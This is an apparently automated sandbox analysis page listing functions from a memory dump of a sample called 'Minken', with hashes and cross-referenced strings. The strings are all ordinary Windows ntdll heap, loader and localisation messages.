Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 72a1adec554fef20b4dd100e82844dff426fed87575b03023b00e4c64e7339c8
Instruction ID: 2f4704608afa1d53c19ecd397a585430ba0a2865603e0853944852ad99021e28
Opcode Fuzzy Hash: 72a1adec554fef20b4dd100e82844dff426fed87575b03023b00e4c64e7339c8
Instruction Fuzzy Hash: B8A17F719083059FE761CF25C480B9BB7E8BB98716F0049AEFA9896241E774DB48CF53

Uniqueness

Uniqueness Score: -1.00%

Function 2314F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 231ADF64, 231AE0A8, 231AE286, 231AE39E
HEAP[%wZ]: , xrefs: 231ADF57, 231AE09B, 231AE279, 231AE391
((LONG)FreeEntry->Size > 1), xrefs: 231AE0B3
(UCRBlock != NULL), xrefs: 231ADF6F
(!TrailingUCR), xrefs: 231AE3A9
(LONG)FreeEntry->Size > 1, xrefs: 231AE291

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: bfe82ba83ec41e75cfcd68273c038de573c3309df41d2e630b458be881252b07
Instruction ID: 6b6e7218055b7d782b3866376ab305dc9e47578d248084cd4999bba46f147ee1
Opcode Fuzzy Hash: bfe82ba83ec41e75cfcd68273c038de573c3309df41d2e630b458be881252b07
Instruction Fuzzy Hash: 5242F175A08781DFC311DF28C890A5ABBE5FF88704F0889EDE6958B352D734DA85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 2316B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 231B84D0
LdrpPreprocessDllName, xrefs: 231B8403, 231B84D7
DLL %wZ was redirected to %wZ by %s, xrefs: 231B83FC
SxS, xrefs: 231B83ED
API set, xrefs: 231B83F4, 231B83F9
minkernel\ntdll\ldrutil.c, xrefs: 231B840D, 231B84E1

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 48b684735ce7bc2bd95e5a8f8c1b9e01751382762a4685f856d3b5a9ac229309
Instruction ID: 7ad4c56680fc83db824e033b473862513be7fb6177a02d8497426b6c81dc0bd2
Opcode Fuzzy Hash: 48b684735ce7bc2bd95e5a8f8c1b9e01751382762a4685f856d3b5a9ac229309
Instruction Fuzzy Hash: 34C17E31B002559BDB149FA6C890BBE77B5AF85700F19C0E9E902DB291D7B4CB64CB91

Uniqueness

Uniqueness Score: -1.00%

Function 231863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 231C40D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 231C41FE
_LdrpInitialize, xrefs: 231C40DF, 231C4141, 231C4205, 231C425F
minkernel\ntdll\ldrinit.c, xrefs: 231C40E9, 231C414B, 231C420F, 231C4269
Delaying execution failed with status 0x%08lx, xrefs: 231C4258
Process initialization failed with status 0x%08lx, xrefs: 231C413A

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 2c0d044560cdb3a47cb05ec53e8b1104ea027aede2a3d808854c21a659c7da1f
Instruction ID: 67671d58eb43cf3ed6110f498aaa4b798a14c1ebdba3d2cd1c9130650271f9a1
Opcode Fuzzy Hash: 2c0d044560cdb3a47cb05ec53e8b1104ea027aede2a3d808854c21a659c7da1f
Instruction Fuzzy Hash: 55917730A04394DFE725EF50D985B8E37A4AF25724F1540E8E750AB282DB789B41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 23182674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 231C2180
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 231C2178
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 231C21BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 231C219F
SXS: %s() passed the empty activation context, xrefs: 231C2165
RtlGetAssemblyStorageRoot, xrefs: 231C2160, 231C219A, 231C21BA

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: c6a3410e4e0ebd672d15b9319dee09328d223246204a5570802cf64717cfdb75
Instruction ID: f26f6558104d2c37c6f6cc18394d48d650e1b6ffdea83cef18d6ff13ab5fd32f
Opcode Fuzzy Hash: c6a3410e4e0ebd672d15b9319dee09328d223246204a5570802cf64717cfdb75
Instruction Fuzzy Hash: 5831F836E102547BFB269A968C80F9B7778DF76A90F0604D9BA14B7145D230DF02CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 2318C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 231C8181, 231C81F5
LdrpInitializeImportRedirection, xrefs: 231C8177, 231C81EB
minkernel\ntdll\ldrinit.c, xrefs: 2318C6C3
Unable to build import redirection Table, Status = 0x%x, xrefs: 231C81E5
LdrpInitializeProcess, xrefs: 2318C6C4
Loading import redirection DLL: '%wZ', xrefs: 231C8170

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 91d902e18d5748a8c2348f23671c23fca3f92c98a4bab9be70caad9d6bb2d94c
Instruction ID: 1dfd76ba651f66b6c5bb24975e812937064e839e73e961790f49a3a1c19a8f16
Opcode Fuzzy Hash: 91d902e18d5748a8c2348f23671c23fca3f92c98a4bab9be70caad9d6bb2d94c
Instruction Fuzzy Hash: 1B3127716053459FD320EF28D985E1A77E4EFA4710F0909E8FA80AB291E720DF05CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 23160770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 231B50BD
HEAP[%wZ]: , xrefs: 231B50AE
(UCRBlock->Size >= *Size), xrefs: 231B50CA

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 1c114ffead5d8ce62effb770bb014a1a8c931623c17ac0a5601e83289a71ba9a
Instruction ID: 2b282292aa2399a2a92c323faa487163292ff3475b1dee14f70edef8a072caa5
Opcode Fuzzy Hash: 1c114ffead5d8ce62effb770bb014a1a8c931623c17ac0a5601e83289a71ba9a
Instruction Fuzzy Hash: 60F17830A05605DFDB15DFA8C890BAAB7BAFB44304F1581E8E5559B382D734EA91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 2318C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2318C7BF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 231C82E8
LdrpInitializePerUserWindowsDirectory, xrefs: 231C82DE
Failed to reallocate the system dirs string !, xrefs: 231C82D7

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 7a3f82f27c9ae01d5681e5c7aedae805bc2771e5f6e497da95a627e9cd82ac4d
Instruction ID: 67390a4af283a2749d48e9c5aae52834f58c10380c9a83f76caad8a94dc6fbe5
Opcode Fuzzy Hash: 7a3f82f27c9ae01d5681e5c7aedae805bc2771e5f6e497da95a627e9cd82ac4d
Instruction Fuzzy Hash: F741E4B2511304ABD760EB64C984B8BB7E8EF64750F0589AAFA48D7251E738DA00CF95

Uniqueness

Uniqueness Score: -1.00%

Function 231D4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231D4809

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 231D4899
LdrpCheckRedirection, xrefs: 231D488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 231D4888

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 0d7490b538f71edfb95bc1288546c92c27a8944eeb3728e693a6e94d5bfcc5be
Instruction ID: 4ac310741764548739b300739e2ee8ed5aee804ea9e4e6ed4e2832db216ea098
Opcode Fuzzy Hash: 0d7490b538f71edfb95bc1288546c92c27a8944eeb3728e693a6e94d5bfcc5be
Instruction Fuzzy Hash: 9B41A433B046589FCB15DE98C942E567BE9EF4A690F0605DDED98D7211DF30DA00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 231751EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Allowed, xrefs: 2317527B
Kernel-MUI-Number-Allowed, xrefs: 23175247
Kernel-MUI-Language-SKU, xrefs: 2317542B
Kernel-MUI-Language-Disallowed, xrefs: 23175352
WindowsExcludedProcs, xrefs: 2317522A

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 557206799f119b5dcd2e8a03540a668eff230be8cc4f35b5e7ca6e6beaef5abb
Instruction ID: c5782b128a7cf1ebaa641a925e13922d3c05ff7730a3812fbcf52682caa9a76b
Opcode Fuzzy Hash: 557206799f119b5dcd2e8a03540a668eff230be8cc4f35b5e7ca6e6beaef5abb
Instruction Fuzzy Hash: D9F12A72D11629EFCB15DFA8C980ADEBBB9FF48650F5540AAE501E7210E7749F01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 2322B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2322B329
RtlDebugPrintTimes.NTDLL ref: 2322B605

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7c68c198ef4ac2fd2c436094ab339d5f3ae76d2e088268ecb05ac1ca8192f4ef
Instruction ID: 0c3758f94ad70c448f674ba99fe3335cfd15303420cd1f30ae1acd2fbf435034
Opcode Fuzzy Hash: 7c68c198ef4ac2fd2c436094ab339d5f3ae76d2e088268ecb05ac1ca8192f4ef
Instruction Fuzzy Hash: 2FF10972E00A128FCB18DF79CDA067DBFF5AF98200B1941ADD456DB381D674EA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 231476B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 231AB023
HEAP[%wZ]: , xrefs: 231AB016
, passed to %s, xrefs: 231AB040
RtlFreeHeap, xrefs: 231AB03F
Invalid heap signature for heap at %p, xrefs: 231AB02F

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: b3e3ffc00549aa022dc1b4834b0c0bb949a9840bb2ac8fa6f575d11021a781bf
Instruction ID: 6e4bad1f91febb68133716e67254ccd4c4640d2846e67b46a5d2527964d195d1
Opcode Fuzzy Hash: b3e3ffc00549aa022dc1b4834b0c0bb949a9840bb2ac8fa6f575d11021a781bf
Instruction Fuzzy Hash: 0C014C3A408A90EFD2259368D55DF927BE4DF52772F1AC0CAE21087593CA78DBC0C160

Uniqueness

Uniqueness Score: -1.00%

Function 231670C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 23167C7C, 2316867F
HEAP[%wZ]: , xrefs: 23167C6D, 23168670
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 23167C96, 23168696

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: ae283592e5dc2c26d0365272b56df82c80c5c5dac2cdf3cac20a7e5f29bc6643
Instruction ID: f14483588e8448e6b7da01e08a2422233d002bcabacbeefa80bb7417f85e8a2f
Opcode Fuzzy Hash: ae283592e5dc2c26d0365272b56df82c80c5c5dac2cdf3cac20a7e5f29bc6643
Instruction Fuzzy Hash: B7139F70A00655CFDB15CFA8C890BE9BBF1BF48304F1981D9D959AB382D734AA95CF90

Uniqueness

Uniqueness Score: -1.00%

Function 2315A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 2315A3EF
LdrResFallbackLangList Exit, xrefs: 2315A3FF
8, xrefs: 2315A3E7
6, xrefs: 2315A3F7

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 409b425ba75040855eec1e647be5c297a4fe6dff313e2e1139374b5154f66630
Instruction ID: 209b1fdf516f02291b641ef621697d3ac3b313bb63384f62896637b1020b6fd0
Opcode Fuzzy Hash: 409b425ba75040855eec1e647be5c297a4fe6dff313e2e1139374b5154f66630
Instruction Fuzzy Hash: 2DC18D74158382CFC716DF58C040B9AB7F4BF88744F0489AAF9A58B291E735CB4ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 2318273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 231C21D9, 231C22B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 231C22B6
.Local, xrefs: 231828D8
SXS: %s() passed the empty activation context, xrefs: 231C21DE

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: fc627723ddd2b241b1c59eed191f2c8456912824e0ddd69116a5841ec86e0854
Instruction ID: 25cd2f2a7367186e5d209ce9d78d8b0fd71820405e97722ae7b45caac5c0f17c
Opcode Fuzzy Hash: fc627723ddd2b241b1c59eed191f2c8456912824e0ddd69116a5841ec86e0854
Instruction Fuzzy Hash: E2A1AB35D102299BDB29DF64C884BD9B3B4BF68314F1505EAD908AB251D7309F82CF99

Uniqueness

Uniqueness Score: -1.00%

Function 2314F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 231AE563
HEAP: , xrefs: 231AE54E
HEAP[%wZ]: , xrefs: 231AE3FE
`, xrefs: 231AE428

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 1a82b7e0558904acbe9203c846156d005c79636bd08f34b3fe83001b9e72ef69
Instruction ID: a81a5c0c81f7ea39868ce2da0f28ea2bf3832ec56561884a2acbc42716b6a68d
Opcode Fuzzy Hash: 1a82b7e0558904acbe9203c846156d005c79636bd08f34b3fe83001b9e72ef69
Instruction Fuzzy Hash: 9261F376604740AFD321DB68C954F9777E8EF80B50F0948E8EAA48B392D734EB45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 232011A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 23201261
HEAP: , xrefs: 2320124A, 2320125D, 2320125F, 232012C4
HEAP[%wZ]: , xrefs: 2320123D, 232012B7
This is located in the %s field of the heap header., xrefs: 232012D6

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 06e9fc728de64fca4d360281787f745e40f37ada8cedac9bae4913273f27987a
Instruction ID: d969ea1a6dbce8cc890939af64fae3f0497259334dca1c37c8e35a6e3f4b2f20
Opcode Fuzzy Hash: 06e9fc728de64fca4d360281787f745e40f37ada8cedac9bae4913273f27987a
Instruction Fuzzy Hash: A131F279510630EFD710DBA8CC81F56B7E8EF28660F1540D5F641CB291D630EE8ACB65

Uniqueness

Uniqueness Score: -1.00%

Function 23149148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualQuery Failed 0x%p %x, xrefs: 231ABAF7
HEAP: , xrefs: 231ABAAD, 231ABAEA
HEAP[%wZ]: , xrefs: 231ABAA0, 231ABADD
VirtualProtect Failed 0x%p %x, xrefs: 231ABABA

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 7eb8329a03c15055c526ebe31b109282067e490019b6baadc5c997c5f03e7f28
Instruction ID: 4a7dbeaacad372a1deb9d93327779431359333d6c0bdae8f64911feae7bf4081
Opcode Fuzzy Hash: 7eb8329a03c15055c526ebe31b109282067e490019b6baadc5c997c5f03e7f28
Instruction Fuzzy Hash: 1C31A176A00154EFC711DB99C884F9ABBB8FF45731F1580D5EA24AB291D770EF80CA60

Uniqueness

Uniqueness Score: -1.00%

Function 23157152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231B17D9
RtlDebugPrintTimes.NTDLL ref: 231B17EE

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5139e02ead0d944797df536b4976c893e3151a3e64cb52663c4cd01e36fc6b32
Instruction ID: 772e8baa89ab6d154824215f53ae4340cea2abe09a1d86412b6cf18bfc6310cf
Opcode Fuzzy Hash: 5139e02ead0d944797df536b4976c893e3151a3e64cb52663c4cd01e36fc6b32
Instruction Fuzzy Hash: 14510231A00605EFEB15EF64C885BADBBB9FF14311F1580E9E52193290DBB49B52CF80

Uniqueness

